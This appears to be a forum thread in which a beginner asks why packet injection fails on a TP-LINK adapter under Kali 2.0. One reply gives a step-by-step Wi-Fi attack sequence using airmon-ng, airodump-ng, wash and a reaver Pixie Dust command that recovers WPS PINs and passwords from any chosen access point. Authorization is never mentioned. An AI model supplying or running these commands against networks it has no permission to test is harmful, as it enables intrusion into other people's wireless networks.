Forum Thread: Injection with Wireless Adapter in Kali 2.0

Hey everyone!

I got my TP-LINK TL-WN722N wireless adapter installed on my Kali, and now i'm trying some WPA/WPA2-PSK crack with Aircrack-ng. The monitor mode worked ok with this commands:

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

For some reason I don't know, enable monitor mode with "airmon-ng start wlan0" didn't worked.

With "airodump-ng wlan0", I could see that monitor mode was working normally. But when I tested the injection of my adapter with "aireplay-ng -9 wlan0", it appears the message "Found 0 APs".

How can I make the injection work?

I'm sorry if there is some missing information, truth is i'm new in wi-fi hacking, so I apologize.
Obs.: I'm running with Kali installed in my computer, not in a VM or Live USB.

2 Responses

is wlan0 your monitor interface? maybe it's wlan0mon ! check again

Found 0 APs means that your wifi adapter isn't picking any AP...maybe because there is NO access point near you. try to change your location and test again

Kali sana 2.0 is slightly different from last revision.

The wlan0 will become wlanmon (this is new name)

for cracking WPA/2 you shall use the wlan0mon

#airmon-ng check kill

#airmon-ng start wlan0

#airodump-ng wlan0mon

open up new terminal

press ctrl & c on last terminal to view networks

on new terminal type wash -i wlan0mon

if you get checksum error type this: wash -i wlan-mon -C

this will tell you if wps is enabled or disabled on AP's

press ctrl & c when done then type: # clear

on first terminal opened, copy the MAC address of AP you want to crack

and type this:

reaver -i wlan0mon -b 00:00:00:00:00 -c 1 -vv -K 1

so what above is doing is -b is bssid = mac, so put AP mac there

-c is channel the AP is on so replace channel

-vv is verbose output

-K 1 is pixie wps (will spit out password and pin in seconds if vunerable)

happy testing and this is for educational purposes only!!!

Share Your Thoughts

  • Hot
  • Active